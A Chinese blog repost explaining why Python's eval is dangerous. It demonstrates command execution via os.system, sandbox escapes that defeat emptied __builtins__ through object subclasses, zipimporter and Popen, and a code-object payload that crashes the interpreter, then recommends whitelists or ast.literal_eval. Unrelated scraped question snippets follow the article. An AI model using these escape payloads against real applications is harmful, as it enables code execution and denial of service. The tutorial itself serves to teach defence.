个人中心
文章发布
退出
作者热门文章
- ubuntu12.04环境下使用kvm ioctl接口实现最简单的虚拟机
- Ubuntu 通过无线网络安装Ubuntu Server启动系统后连接无线网络的方法
- 在Ubuntu上搭建网桥的方法
- ubuntu 虚拟机上网方式及相关配置详解
27
4
CFSDN坚持开源创造价值,我们致力于搭建一个资源共享平台,让每一个IT人在这里找到属于你的精彩世界.
这篇CFSDN的博客文章python 为什么说eval要慎用由作者收集整理,如果你对这篇文章有兴趣,记得点赞哟.
eval前言 。
|
1
2
3
4
5
|
in
[
1
]:
eval
(
"2+3"
)
out[
1
]:
5
in
[
2
]:
eval
(
'[x for x in range(9)]'
)
out[
2
]: [
0
,
1
,
2
,
3
,
4
,
5
,
6
,
7
,
8
]
|
当内存中的内置模块含有os的话,eval同样可以做到命令执行:
|
1
2
3
4
5
|
in
[
3
]:
import
os
in
[
4
]:
eval
(
"os.system('whoami')"
)
hy
-
201707271917
\administrator
out[
4
]:
0
|
当然,eval只能执行python的表达式类型的代码,不能直接用它进行import操作,但exec可以。如果非要使用eval进行import,则使用__import__:
|
1
2
3
|
in
[
8
]:
eval
(
"__import__('os').system('whoami')"
)
hy
-
201707271917
\administrator
out[
8
]:
0
|
在实际的代码中,往往有使用客户端数据带入eval中执行的需求。比如动态模块的引入,举个栗子,一个在线爬虫平台上爬虫可能有多个并且位于不同的模块中,服务器端但往往只需要调用用户在客户端选择的爬虫类型,并通过后端的exec或者eval进行动态调用,后端编码实现非常方便。但如果对用户的请求处理不恰当,就会造成严重的安全漏洞.
”安全”使用eval 。
现在提倡最多的就是使用eval的后两个参数来设置函数的白名单:
eval函数的声明为eval(expression[, globals[, locals]]) 。
其中,第二三个参数分别指定能够在eval中使用的函数等,如果不指定,默认为globals()和locals()函数中 包含的模块和函数.
|
1
2
3
4
5
6
7
8
9
10
11
|
>>>
import
os
>>>
'os'
in
globals
()
true
>>>
eval
(
'os.system('
whoami
')'
)
win
-
20140812chjadministrator
0
>>>
eval
(
'os.system('
whoami
')'
,{},{})
traceback (most recent call last):
file
"", line
1
,
in
file
"", line
1
,
in
nameerror: name
'os'
is
not
defined
|
如果指定只允许调用abs函数,可以使用下面的写法:
|
1
2
3
4
5
6
7
8
9
10
|
>>>
eval
(
'abs(-20)'
,{
'abs'
:
abs
},{
'abs'
:
abs
})
20
>>>
eval
(
'os.system('
whoami
')'
,{
'abs'
:
abs
},{
'abs'
:
abs
})
traceback (most recent call last):
file
"", line
1
,
in
file
"", line
1
,
in
nameerror: name
'os'
is
not
defined
>>>
eval
(
'os.system('
whoami
')'
)
win
-
20140812chjadministrator
0
|
使用这种方法来防护,确实可以起到一定的作用,但是,这种处理方法可能会被绕过,从而造成其他问题! 。
绕过执行代码1 。
被绕过的情景如下,小明知道了eval会带来一定的安全风险,所以使用如下的手段去防止eval执行任意代码:
|
1
2
3
4
5
6
7
8
|
env
=
{}
env[
"locals"
]
=
none
env[
"globals"
]
=
none
env[
"__name__"
]
=
none
env[
"__file__"
]
=
none
env[
"__builtins__"
]
=
none
eval
(users_str, env)
|
python中的__builtins__是内置模块,用来设置内置函数的模块。比如熟悉的abs,open等内置函数,都是在该模块中以字典的方式存储的,下面两种写法是等价的:
|
1
2
3
4
|
>>> __builtins__.
abs
(
-
20
)
20
>>>
abs
(
-
20
)
20
|
我们也可以自定义内置函数,并像使用python中的内置函数一样使用它们:
|
1
2
3
4
5
|
>>>
def
hello():
...
print
'shabi'
>>> __builtin__.__dict__[
'say_hello'
]
=
hello
>>> say_hello()
shabi
|
小明将eval函数的作用域中的内置模块设置为none,好像看起来很彻底了,但依然可以被绕过。__builtins__是__builtin__的一个引用,在__main__模块下,两者是等价的:
|
1
2
3
4
|
>>>
id
(__builtins__)
3549136
>>>
id
(__builtin__)
3549136
|
根据乌云drops提到的方法,使用如下代码即可:
[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname") 。
上面的代码首先利用__class__和__subclasses__动态加载了object对象,这是因为eval中无法直接使用object。然后使用object的子类的zipimporter对egg压缩文件中的configobj模块进行导入,并调用其内置模块中的os模块从而实现命令执行,当然,前提是要有configobj的egg文件。 configobj模块很有意思,居然内置了os模块:
|
1
2
3
4
5
6
7
8
9
10
11
|
>>>
"os"
in
configobj.__dict__
true
>>>
import
urllib
>>>
"os"
in
urllib.__dict__
true
>>>
import
urllib2
>>>
"os"
in
urllib2.__dict__
true
>>> configobj.os.system(
"whoami"
)
win
-
20140812chjadministrator
0
|
和configobj类似的模块如urllib,urllib2,setuptools等都有os的内置,理论上使用哪个都行。 如果无法下载egg压缩文件,可以下载带有setup.py的文件夹,加入:
|
1
|
from
setuptools
import
setup, find_packages
|
然后执行
|
1
|
python setup.py bdist_egg
|
就可以在dist文件夹中找到对应的egg文件。 绕过demo如下:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
|
>>> env
=
{}
>>> env[
"locals"
]
=
none
>>> env[
"globals"
]
=
none
>>> env[
"__name__"
]
=
none
>>> env[
"__file__"
]
=
none
>>> env[
"__builtins__"
]
=
none
>>> users_str
=
"[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('e:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')"
>>>
eval
(users_str, env)
win
-
20140812chjadministrator
0
>>>
eval
(users_str, {}, {})
win
-
20140812chjadministrator
0
|
拒绝服务攻击1 。
object的子类中有很多有趣的东西,执行以下代码查看:
[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()] 。
这里我就不输出结果了,如果你执行的话,可以看到很多有趣的模块,比如file,zipimporter,quitter等。经过测试,file的构造函数是被解释器沙箱隔离的。 简单的,或者直接使object暴露出的子类quitter进行退出:
|
1
2
|
>>>
eval
("[x
for
x
in
().__class__.__bases__[
0
].__subclasses__()
if
x.__name__
=
=
'quitter'
][
0
](
0
)()", {
'__builtins__'
:none})
|
c:/> 。
如果运气好,遇到对方程序中导入了os等敏感模块,那么popen就可以用,并且绕过__builins__为空的限制,例子如下:
|
1
2
3
4
5
|
>>>
import
subprocess
>>>
eval
(
"[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'popen'][0](['ping','-n','1','127.0.0.1'])"
,{
'__builtins__'
:none})
>>>
正在 ping
127.0
.
0.1
具有
32
字节的数据:<br>来自
127.0
.
0.1
的回复: 字节
=
32
时间>>
|
事实上,这种情况非常多,比如导入os模块,一般用来处理路径问题。所以说,遇到这种情况,完全可以列举大量的功能函数,来探测目标object的子类中是否含有一些危险的函数可以直接使用.
拒绝服务攻击2 。
同样,我们甚至可以绕过__builtins__为none,造成一次拒绝服务攻击,payload(来自老外blog)如下:
>>> eval('(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"kaboom",(),(),(),"","",0,""),{})())()', {"__builtins__":none}) 。
运行上面的代码,python直接crash掉了,造成拒绝服务攻击。 原理是通过嵌套的lambda来构造一片代码段,即code对象。为这个code对象分配空的栈,并给出相应的代码字符串,这里是kaboom,在空栈上执行代码,会出现crash。构造完成后,调用fc函数即可触发,其思路不可谓不淫荡.
总结 。
从上面的内容我们可以看出,单单将内置模块置为空,是不够的,最好的机制是构造白名单,如果觉得比较麻烦,可以使用ast.literal_eval代替不安全的eval.
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持我.
原文链接:https://segmentfault.com/a/1190000011532358 。
最后此篇关于python 为什么说eval要慎用的文章就讲到这里了,如果你想了解更多关于python 为什么说eval要慎用的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。
27
4
0
我正在编写一个 JS 程序,我有一个条件可以根据输入进行一些算术运算。如果我遇到操作类型为“add”,我需要将两个值相加;如果我得到“times”作为我的运算符值,我需要相乘。 我尝试使用基本的 if
我正在编写一个仅作为查看器的应用程序 - 无需创建、无需编辑、无需保存。 显然,那么,不会有自动保存,但是还有什么其他东西可以从 autosavesInPlace 返回 YES 改变世界,从而对观看者
Azure 开始出现以下错误: Unsupported token. Unable to initialize the authorization context. 每当我尝试更改我的应用程序时,我都
当我编写 out.println() 时,Eclipse 提示 out 无法解析。 我导入了 java.io.* 和其他 servlet 包。 最佳答案 只是在黑暗中拍摄,我认为这就是您正在寻找的出路
Azure 开始出现以下错误: Unsupported token. Unable to initialize the authorization context. 每当我尝试更改我的应用程序时,我都
是否可以执行类似的操作来检查 radio 表单是否未选中: if !($(this).find("input:checked")) {} 正确的语法是什么? 最佳答案 试试这个: $(this).fi
我正在尝试从表中选择行,其中 date 列值等于澳大利亚悉尼的当前日期 (UTC+10h)。服务器位于悉尼,因此我想使用 SYSDATETIME()。这是我的查询: SELECT * FROM dat
我听说 JavaScript 实际上并不像其他语言那样“指向”内存中的值(或对象,因为在 JS 中一切都是对象)。相反,JS 变量引用内存中的其他值/对象。这是真的?指向和引用之间的语义区别是什么?
我的计算机科学类(class)有一项作业,其中要求读取包含多个测试分数的文件,并要求我对它们进行求和并求平均值。虽然求和和求平均值很容易,但我在读取文件时遇到问题。老师说用这个语法 Scanner s
Java 的 XML 解析器似乎认为我的 XML 文档在根元素之后的格式不正确。但我已经用几种工具验证了它,但他们都不同意。这可能是我的代码错误,而不是文档本身的错误。如果你们能给我提供任何帮助,我将
根据这份文件: http://www.stroustrup.com/terminology.pdf l 值具有同一性且不可移动。 公关值是可移动的,但没有身份。 x 值具有同一性并且是可移动的。 关于
这个问题在这里已经有了答案: What does "atomic" mean in programming? (7 个答案) 关闭 5 年前。 我正在阅读 MongoDB 的 documentati
在 PHP 和 MySQL 中有没有一种方法能够比较 2 个不同的数组(列表)变量并说出有多少项是相同的 例如, $array1 = "hello, bye, google, laptop, yes"
本文来自 Effective Java Programs that use the int enum pattern are brittle. Because int enums are compil
C++ 中有一些特性是类型安全的,而另一些则不是。 C++ 类型安全示例: char c = 'a'; int *p = &c; // this is not allowed (compiler
我有一个 CS 课的作业,它说要读取一个包含多个测试分数的文件,并要求我对它们求和并取平均值。虽然求和和平均很容易,但我在读取文件时遇到了问题。老师说要用这个语法 Scanner scores = n
嗯.. 有时,PyDev 会说“ Unresolved 导入错误”。 在我的环境中 Python2.6.6 Eclipse3.7 PyDev2.2.2 错误是。 > Unresolved import
我正在向服务器发送请求,服务器正在处理请求并做出响应。但是在我的应用程序中,我收到了: Error Domain=NSURLErrorDomain Code=-1017 "cannot parse r
在我最近的一次讨论中,有人告诉我这样说是不正确的,因为 Ajax 已经是 Javascript。 上下文: “我如何在网页中 blablababal,这样它就不必刷新页面” 我的回答: “使用 Jav
下午好。 我一直在尝试使用 ffmpeg 将 .mpeg 拆分为一系列 .jpeg 图像。请注意,这是指定 here 的逆问题,但我面临的问题与该线程的作者面临的问题不同。 具体来说,我已经在我的 f
我是一名优秀的程序员,十分优秀!